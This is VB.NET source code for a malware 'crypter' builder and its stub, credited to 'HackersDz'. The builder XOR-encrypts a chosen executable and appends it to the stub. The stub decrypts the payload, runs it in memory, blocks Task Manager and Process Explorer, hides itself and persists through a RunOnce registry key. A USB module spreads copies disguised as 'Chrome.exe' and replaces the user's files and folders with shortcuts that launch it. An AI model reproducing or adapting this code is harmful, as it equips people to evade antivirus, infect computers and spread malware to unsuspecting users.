Me.StButton1.BackColorTop = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton1.DisabledBottomColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StButton1.DisabledTopColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton1.Font = New System.Drawing.Font("Times New Roman", 9.75!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StButton1.HorizontalTextAlign = System.Drawing.StringAlignment.Center
Me.StButton1.HoverBackColor = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton1.HoverColor = System.Drawing.Color.FromArgb(CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer))
Me.StButton1.Location = New System.Drawing.Point(316, 161)
Me.StButton1.MinimumSize = New System.Drawing.Size(15, 15)
Me.StButton1.Name = "StButton1"
Me.StButton1.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton1.OutlineThickness = 1
Me.StButton1.PressedBottomColor = System.Drawing.Color.FromArgb(CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer))
Me.StButton1.PressedTopColor = System.Drawing.Color.FromArgb(CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer))
Me.StButton1.Radius = 3
Me.StButton1.Size = New System.Drawing.Size(87, 29)
Me.StButton1.TabIndex = 3
Me.StButton1.Text = "Server"
Me.StButton1.TextBackColor = System.Drawing.Color.Black
Me.StButton1.TextColor = System.Drawing.Color.White
Me.StButton1.VerticalTextAlign = System.Drawing.StringAlignment.Center
'
'LogInNormalTextBox3
'
Me.LogInNormalTextBox3.BackColor = System.Drawing.Color.Transparent
Me.LogInNormalTextBox3.BackgroundColour = System.Drawing.Color.FromArgb(CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer))
Me.LogInNormalTextBox3.BorderColour = System.Drawing.Color.FromArgb(CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer))
Me.LogInNormalTextBox3.Location = New System.Drawing.Point(12, 252)
Me.LogInNormalTextBox3.MaxLength = 32767
Me.LogInNormalTextBox3.Multiline = False
Me.LogInNormalTextBox3.Name = "LogInNormalTextBox3"
Me.LogInNormalTextBox3.ReadOnly = False
Me.LogInNormalTextBox3.Size = New System.Drawing.Size(286, 29)
Me.LogInNormalTextBox3.Style = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox.Styles.NotRounded
Me.LogInNormalTextBox3.TabIndex = 2
Me.LogInNormalTextBox3.TextAlign = System.Windows.Forms.HorizontalAlignment.Left
Me.LogInNormalTextBox3.TextColour = System.Drawing.Color.Lime
Me.LogInNormalTextBox3.UseSystemPasswordChar = False
'
'Form1
'
Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!)
Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
Me.ClientSize = New System.Drawing.Size(415, 502)
Me.Controls.Add(Me.StTheme1)
Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None
Me.Icon = CType(resources.GetObject("$this.Icon"), System.Drawing.Icon)
Me.Name = "Form1"
Me.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen
Me.Text = " Dragon Crypter By [ıllıllıMя.HackeяsDzıllıllı]"
Me.TransparencyKey = System.Drawing.Color.Magenta
Me.StTheme1.ResumeLayout(false)
CType(Me.PictureBox1,System.ComponentModel.ISupportInitialize).EndInit
Me.LogInGroupBox2.ResumeLayout(false)
Me.ResumeLayout(false)
End Sub
Friend WithEvents StTheme1 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STTheme
Friend WithEvents LogInGroupBox2 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInGroupBox
Friend WithEvents StButton3 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton
Friend WithEvents StButton2 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton
Friend WithEvents StButton1 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton
Friend WithEvents LogInNormalTextBox3 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox
Friend WithEvents StButton4 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton
Friend WithEvents StCheckBox1 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox
Friend WithEvents StCheckBox2 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox
Friend WithEvents StCheckBox3 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox
Friend WithEvents StCheckBox4 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox
Friend WithEvents LogInNormalTextBox1 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox
Friend WithEvents LogInNormalTextBox2 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox
Friend WithEvents LogInProgressBar1 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInProgressBar
Friend WithEvents StControlButton2 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STControlButton
Friend WithEvents StControlButton1 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STControlButton
Friend WithEvents PictureBox1 As System.Windows.Forms.PictureBox
Friend WithEvents StCheckBox5 As Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox
End Class
@@ -0,0 +1,149 @@
Public Class Form1
Const hamza = "%%HACKERSDZ%%Devpoint&&$$$Hamza££££"
Dim AntiTas, Sleepp, Hid, RunOnce, Spread As String
Dim DOTP As String = ""
Dim stub As String
Private Sub StButton1_Click(sender As Object, e As EventArgs) Handles StButton1.Click
Try
Dim ofd As New OpenFileDialog
ofd.Title = " Server"
ofd.Filter = ".exe | *.exe"
ofd.ShowDialog()
LogInNormalTextBox2.Text = ofd.FileName
Catch ex As Exception
End Try
End Sub
Private Sub StButton2_Click(sender As Object, e As EventArgs) Handles StButton2.Click
Try
Dim ofd As New OpenFileDialog
ofd.Title = "Stub"
ofd.Filter = ".exe | *.exe"
ofd.ShowDialog()
LogInNormalTextBox1.Text = ofd.FileName
Catch ex As Exception
End Try
End Sub
Public Function GeneratePassword(ByVal Uppers As Boolean, ByVal Lowers As Boolean, ByVal Numbers As Boolean, ByVal Specials As Boolean, ByVal passwordLength As Integer) As String
Dim H As String = ""
Dim Black As String = ""
If Uppers Then
H = (H & "あいうえおはひふへほもめみまこけくきかẦḆḈḒḔ123456789AZERTYUIOPQSSDFGHJKLMWXCVBN頂革難六五四事亊争予与ӨҞώϟωϐϚЀӔөӧҶҼҘқҍ")
End If
VBMath.Randomize()
Dim num2 As Integer = (passwordLength - 1)
Dim i As Integer = 0
Do While (i <= num2)
Black = (Black & Strings.Mid(H, CInt(Math.Round(CDbl(((Strings.Len(H) * VBMath.Rnd) + 1.0!)))), 1))
i += 1
Loop
Return Black
End Function
Private Sub StButton3_Click(sender As Object, e As EventArgs) Handles StButton3.Click
LogInNormalTextBox3.Text = (GeneratePassword(True, True, False, False, 60))
End Sub
Private Sub StButton4_Click(sender As Object, e As EventArgs) Handles StButton4.Click
Try
Dim sfd As New SaveFileDialog
LogInProgressBar1.Value = 10
Dim sfdname As String
sfd.Title = "Save Crypted File"
sfd.Filter = ".exe | *.exe"
sfd.ShowDialog()
sfdname = sfd.FileName
LogInProgressBar1.Value = 30
If StCheckBox2.Checked = True Then : AntiTas = True : Else : AntiTas = False : End If
If StCheckBox1.Checked = True Then : Sleepp = True : Else : Sleepp = False : End If
If StCheckBox4.Checked = True Then : Hid = True : Else : Hid = False : End If
If StCheckBox3.Checked = True Then : RunOnce = True : Else : RunOnce = False : End If
If StCheckBox5.Checked = True Then : Spread = True : Else : Spread = False : End If
LogInProgressBar1.Value = 60
If LogInNormalTextBox3.Text = "" Then
MsgBox("Please Generate A Key ", MsgBoxStyle.Information, "Invalid Key")
Exit Sub
Else
Dim DZ As New PXOR(LogInNormalTextBox3.Text)
Dim DEV As String = LogInNormalTextBox2.Text
Dim dddd As String = LogInNormalTextBox1.Text
FileOpen(1, DEV, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
DOTP = Space(LOF(1))
FileGet(1, DOTP)
FileClose(1)
FileOpen(1, dddd, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
FileOpen(1, sfdname, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
LogInProgressBar1.Value = 70
FilePut(1, stub & hamza & DZ.PolyCrypt(DOTP) & hamza & LogInNormalTextBox3.Text & hamza & AntiTas & hamza & Sleepp & hamza & Hid & hamza & RunOnce & hamza & Spread)
FileClose(1)
LogInProgressBar1.Value = 100
MsgBox("Your Server Has Been Crypted^^", MsgBoxStyle.Information, "^^Crypted^^")
Invalidate()
Refresh()
End If
Catch ex As Exception
End Try
End Sub
End Class
@@ -0,0 +1,61 @@
Imports System.Text
Public Class PXOR
Private regKey As String = ""
Public Property Key() As String
Get
Return regKey
End Get
Set(ByVal value As String)
regKey = value
End Set
End Property
Public Sub New(ByVal Key As String)
Me.Key = Key
End Sub
Public Sub New()
Me.Key = ""
End Sub
Public Function PolyCrypt(ByVal Data As String) As String
Return Encoding.Default.GetString(PolyCrypt(Encoding.Default.GetBytes(Data)))
End Function
Public Function PolyDeCrypt(ByVal Data As String) As String
Return Encoding.Default.GetString(PolyDeCrypt(Encoding.Default.GetBytes(Data)))
End Function
Public Function PolyCrypt(ByVal Data() As Byte) As Byte()
Dim ReturnBuffer(Data.Length) As Byte
ReturnBuffer(0) = Convert.ToByte(New Random().Next(1, 255))
For i = 0 To Data.Length - 1
ReturnBuffer(i + 1) = ModuloByte(ReturnBuffer(i), Data(i))
Next
Return XorCrypt(ReturnBuffer, Encoding.Default.GetBytes(Key))
End Function
Public Function PolyDeCrypt(ByVal Data() As Byte) As Byte()
Data = XorCrypt(Data, Encoding.Default.GetBytes(Key))
Dim ReturnBuffer(Data.Length - 2) As Byte
For i = Data.Length - 1 To 1 Step -1
ReturnBuffer(i - 1) = ModuloByte(Data(i), -Data(i - 1))
Next
Return ReturnBuffer
End Function
Private Function ModuloByte(ByVal MyByte As Byte, ByVal Addition As Int16) As Byte
While Addition < 0
Addition += 256
End While
Return Convert.ToByte((MyByte + Addition) Mod 256)
End Function
Private Function XorCrypt(ByVal Data() As Byte, ByVal Key() As Byte) As Byte()
If Key.Length <> 0 Then
For i = 0 To Data.Length - 1
Data(i) = Data(i) Xor ModuloByte(Key(i Mod Key.Length), [Key](Key(i Mod Key.Length) Mod Key.Length)) Xor [Key](((i + (i Mod 7)) Mod Key.Length) Mod Key.Length)
Next
End If
Return Data
End Function
Public Function XorCrypt(ByVal Data As String, ByVal Key As String) As String
Return Encoding.Default.GetString(XorCrypt(Encoding.Default.GetBytes(Data), Encoding.Default.GetBytes(Key)))
End Function
End Class
@@ -0,0 +1,38 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.18408
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Namespace My
'NOTE: This file is auto-generated; do not modify it directly. To make changes,
' or if you encounter build errors in this file, go to the Project Designer
' (go to Project Properties or double-click the My Project node in
' Solution Explorer), and make changes on the Application tab.
'
Partial Friend Class MyApplication
<Global.System.Diagnostics.DebuggerStepThroughAttribute()> _
Public Sub New()
MyBase.New(Global.Microsoft.VisualBasic.ApplicationServices.AuthenticationMode.Windows)
Me.IsSingleInstance = false
Me.EnableVisualStyles = true
Me.SaveMySettingsOnExit = true
Me.ShutDownStyle = Global.Microsoft.VisualBasic.ApplicationServices.ShutdownMode.AfterMainFormCloses
End Sub
<Global.System.Diagnostics.DebuggerStepThroughAttribute()> _
Protected Overrides Sub OnCreateMainForm()
Me.MainForm = Global.Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.Form1
End Sub
End Class
End Namespace
@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<MySubMain>true</MySubMain>
<MainForm>Form1</MainForm>
<SingleInstance>false</SingleInstance>
<ShutdownMode>0</ShutdownMode>
<EnableVisualStyles>true</EnableVisualStyles>
<AuthenticationMode>0</AuthenticationMode>
<ApplicationType>0</ApplicationType>
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
</MyApplicationData>
@@ -0,0 +1,35 @@
Imports System
Imports System.Reflection
Imports System.Runtime.InteropServices
' General Information about an assembly is controlled through the following
' set of attributes. Change these attribute values to modify the information
' associated with an assembly.
' Review the values of the assembly attributes
<Assembly: AssemblyTitle("Builder Crypter By [ıllıllıMя.HackeяsDzıllıllı]")>
<Assembly: AssemblyDescription("")>
<Assembly: AssemblyCompany("")>
<Assembly: AssemblyProduct("Builder Crypter By [ıllıllıMя.HackeяsDzıllıllı]")>
<Assembly: AssemblyCopyright("Copyright © 2014")>
<Assembly: AssemblyTrademark("")>
<Assembly: ComVisible(False)>
'The following GUID is for the ID of the typelib if this project is exposed to COM
<Assembly: Guid("b994bd1a-3d21-4e74-933a-c0c53fc494f0")>
' Version information for an assembly consists of the following four values:
'
' Major Version
' Minor Version
' Build Number
' Revision
'
' You can specify all the values or you can default the Build and Revision Numbers
' by using the '*' as shown below:
' <Assembly: AssemblyVersion("1.0.*")>
<Assembly: AssemblyVersion("1.0.0.0")>
<Assembly: AssemblyFileVersion("1.0.0.0")>
@@ -0,0 +1,62 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.18408
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Namespace My.Resources
'This class was auto-generated by the StronglyTypedResourceBuilder
'class via a tool like ResGen or Visual Studio.
'To add or remove a member, edit your .ResX file then rerun ResGen
'with the /str option, or rebuild your VS project.
'''<summary>
''' A strongly-typed resource class, for looking up localized strings, etc.
'''</summary>
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
Friend Module Resources
Private resourceMan As Global.System.Resources.ResourceManager
Private resourceCulture As Global.System.Globalization.CultureInfo
'''<summary>
''' Returns the cached ResourceManager instance used by this class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
Get
If Object.ReferenceEquals(resourceMan, Nothing) Then
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Builder_Crypter__By___ıllıllıMя.HackeяsDzıllıllı_.Resources", GetType(Resources).Assembly)
resourceMan = temp
End If
Return resourceMan
End Get
End Property
'''<summary>
''' Overrides the current thread's CurrentUICulture property for all
''' resource lookups using this strongly typed resource class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend Property Culture() As Global.System.Globalization.CultureInfo
Get
Return resourceCulture
End Get
Set(ByVal value As Global.System.Globalization.CultureInfo)
resourceCulture = value
End Set
End Property
End Module
End Namespace
@@ -0,0 +1,117 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,73 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.18408
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Namespace My
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0"), _
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Partial Friend NotInheritable Class MySettings
Inherits Global.System.Configuration.ApplicationSettingsBase
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings), MySettings)
#Region "My.Settings Auto-Save Functionality"
#If _MyType = "WindowsForms" Then
Private Shared addedHandler As Boolean
Private Shared addedHandlerLockObject As New Object
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Private Shared Sub AutoSaveSettings(ByVal sender As Global.System.Object, ByVal e As Global.System.EventArgs)
If My.Application.SaveMySettingsOnExit Then
My.Settings.Save()
End If
End Sub
#End If
#End Region
Public Shared ReadOnly Property [Default]() As MySettings
Get
#If _MyType = "WindowsForms" Then
If Not addedHandler Then
SyncLock addedHandlerLockObject
If Not addedHandler Then
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
addedHandler = True
End If
End SyncLock
End If
#End If
Return defaultInstance
End Get
End Property
End Class
End Namespace
Namespace My
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
Friend Module MySettingsProperty
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
Friend ReadOnly Property Settings() As Global.Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.My.MySettings
Get
Return Global.Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.My.MySettings.Default
End Get
End Property
End Module
End Namespace
@@ -0,0 +1,7 @@
<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
<Profiles>
<Profile Name="(Default)" />
</Profiles>
<Settings />
</SettingsFile>
+79
View File
@@ -0,0 +1,79 @@
Public Class AntiTaskManager
' C0d3d bY njq8
<Runtime.InteropServices.DllImport("user32.dll")> _
Private Shared Function EnableWindow(ByVal hWnd As IntPtr, ByVal bEnable As Boolean) As Boolean
End Function
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As _
IntPtr, ByRef lpdwProcessID As Integer) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As IntPtr
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As _
Integer, ByVal lpClassName As String, ByVal nMaxCount As Integer) As Integer
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal _
hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As String) As Integer
Private Declare Auto Function GetWindowText Lib "user32.dll" (ByVal hwnd As Int32, _
ByVal lpString As System.Text.StringBuilder, ByVal cch As Int32) As Int32
Private Declare Auto Function GetWindowTextLength Lib "user32.dll" (ByVal hwnd As Int32) As Int32
Private Delegate Function EnumWindProc(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
Private Delegate Function EnumChildWindProc(ByVal hWnd As Int32, ByVal _
lParam As Int32) As Boolean
Private Declare Function EnumChildWindows Lib "user32" (ByVal hWnd As IntPtr, _
ByVal lpEnumFunc As EnumWindProc, ByRef lParam As IntPtr) As Int32
Private Function EnumChild(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
CLD.Add(hWnd)
Return True
End Function
Public Sub protect()
While True
Threading.Thread.Sleep(200)
Dim hwd = GetForegroundWindow
If hwd.ToInt32 = 0 Then Continue While
Dim id As Integer = 0
GetWindowThreadProcessId(hwd, id)
If id > 0 Then
Dim Title As String = ""
Dim text_len As Integer = GetWindowTextLength(hwd)
If text_len = 0 Then
Title = ""
Else
Dim sb As New System.Text.StringBuilder(text_len + 1)
Dim ret = GetWindowText(hwd, sb, sb.Capacity)
If ret = 0 Then
Title = ""
Else
Title = sb.ToString
End If
End If
Dim p As Process = Process.GetProcessById(id)
If p.ProcessName.ToLower = "taskmgr" Or p.ProcessName.ToLower _
= "processhacker" Or Title.ToLower = "process explorer" Then
Dim button As New List(Of IntPtr)
Dim statics As Integer = 0
For Each x As IntPtr In GetChild(hwd)
Dim className As String = Space(200)
Dim ln As Integer = GetClassName(x, className, 200)
className = className.Remove(ln, 200 - ln)
If className.ToLower = "button" Then
button.Add(x)
End If
If className.ToLower = "static" Or className.ToLower _
= "directuihwnd" Then
statics += 1
End If
Next
If button.Count = 2 And (statics = 2 Or statics = 1) Then
EnableWindow(button(0), False)
SendMessage(button(0), &HC, 0, "")
End If
End If
End If
End While
End Sub
Private CLD As New List(Of IntPtr)
Private Function GetChild(ByVal hwd As IntPtr) As IntPtr()
SyncLock Me
CLD.Clear()
EnumChildWindows(hwd, New EnumWindProc(AddressOf EnumChild), 0)
Return CLD.ToArray
End SyncLock
End Function
End Class
+57
View File
@@ -0,0 +1,57 @@
Public Module USB
Private H As Threading.Thread
Public Sub Enable()
H = New Threading.Thread(AddressOf WorkThread)
H.Start()
End Sub
Public Sub Disable()
H.Abort()
End Sub
Public Sub WorkThread()
GoAgain:
Dim allDrives() As IO.DriveInfo = IO.DriveInfo.GetDrives()
Dim d As IO.DriveInfo
Dim VbsObj As Object
VbsObj = CreateObject("WScript.Shell")
Dim DE As Object
For Each d In allDrives
If d.IsReady = True AndAlso d.DriveType = IO.DriveType.Removable Then
Dim RootDir As String = d.RootDirectory.ToString
Try : IO.File.Copy(Process.GetCurrentProcess.MainModule.FileName, RootDir & "Chrome.exe") : Catch : End Try
IO.File.SetAttributes(RootDir & "Chrome.exe", IO.FileAttributes.Hidden)
For Each f As String In IO.Directory.GetFiles(RootDir)
If IO.Path.GetFileNameWithoutExtension(f) = "Chrome" Then GoTo GoHere
If Not f.Contains(".lnk") Then
IO.File.SetAttributes(f, IO.FileAttributes.Hidden)
End If
DE = VbsObj.CreateShortcut(RootDir & IO.Path.GetFileNameWithoutExtension(f) & ".lnk")
DE.TargetPath = RootDir & "Chrome.exe"
DE.WorkingDirectory = RootDir
DE.IconLocation = f & ", 0"
DE.Save()
GoHere:
Next
For Each dx As String In IO.Directory.GetDirectories(RootDir)
Dim dir As New System.IO.DirectoryInfo(dx)
dir.Attributes = IO.FileAttributes.Hidden
DE = VbsObj.CreateShortcut(dx & ".lnk")
DE.TargetPath = RootDir & "Chrome.exe"
DE.WorkingDirectory = RootDir
DE.IconLocation = Environment.GetEnvironmentVariable("windir") & "\System32\Shell32.dll" & ", 3"
DE.Save()
Next
End If
Next
Threading.Thread.Sleep(1000)
GoTo GoAgain
End Sub
End Module
+105
View File
@@ -0,0 +1,105 @@
Imports System.IO
Imports System.Text
Imports System.Threading
Imports System.Reflection
Module Module4
Const Hamzaa = "%%HACKERSDZ%%Devpoint&&$$$Hamza££££"
Dim AntiTas, Sleepp, Hid, RunOnce, spread As String
Dim KGB As String
Dim Bytes() As Byte
Sub Main()
Dim Hamzao() As String
Dim file1 As String
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
file1 = Space(LOF(1))
FileGet(1, file1)
FileClose(1)
Hamzao = Split(file1, Hamzaa)
Dim xduh As New XORR(Hamzao(2))
KGB = xduh.PolyDeCrypt(Hamzao(1)) : AntiTas = Hamzao(3) : Sleepp = Hamzao(4) : Hid = Hamzao(5) : RunOnce = Hamzao(6) : spread = Hamzao(7)
If AntiTas = True Then : AntiTaskManager() : Else : End If
If Sleepp = True Then : Sleep() : Else : End If
If Hid = True Then : HideFile() : Else : End If
If RunOnce = True Then : RunOnceStartup() : Else : End If
If spread = True Then : Spreadusb() : Else : End If
Bytes = Encoding.Default.GetBytes(KGB)
RunM(Bytes)
End Sub
Public Sub RunM(ByVal assembly() As Byte)
Dim Hamza As Assembly = AppDomain.CurrentDomain.Load(assembly)
Dim DEVPOINT As MethodInfo = Hamza.EntryPoint
Dim Cracked As Object = Hamza.CreateInstance(DEVPOINT.Name)
Dim Programe As Object() = Nothing
If (DEVPOINT.GetParameters.Length > 0) Then
Programe = New Object() {New String() {Nothing}}
End If
DEVPOINT.Invoke(Cracked, Programe)
End Sub
Dim run As String = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
Public Sub RunStartup(h As [Boolean], p As String, a As String)
Dim key As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(run, True)
If h = True Then
key.SetValue(p, a)
Else
key.DeleteValue(p, False)
End If
End Sub
Sub Spreadusb()
USB.Enable()
End Sub
Sub HideFile()
File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden)
End Sub
Sub Sleep()
System.Threading.Thread.Sleep(20000)
End Sub
Public hamza As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
Sub RunOnceStartup()
IO.File.Copy(Application.ExecutablePath, hamza & " \Windowss.exe")
RunStartup(True, "Windowss", hamza & "\Windowss.exe")
End Sub
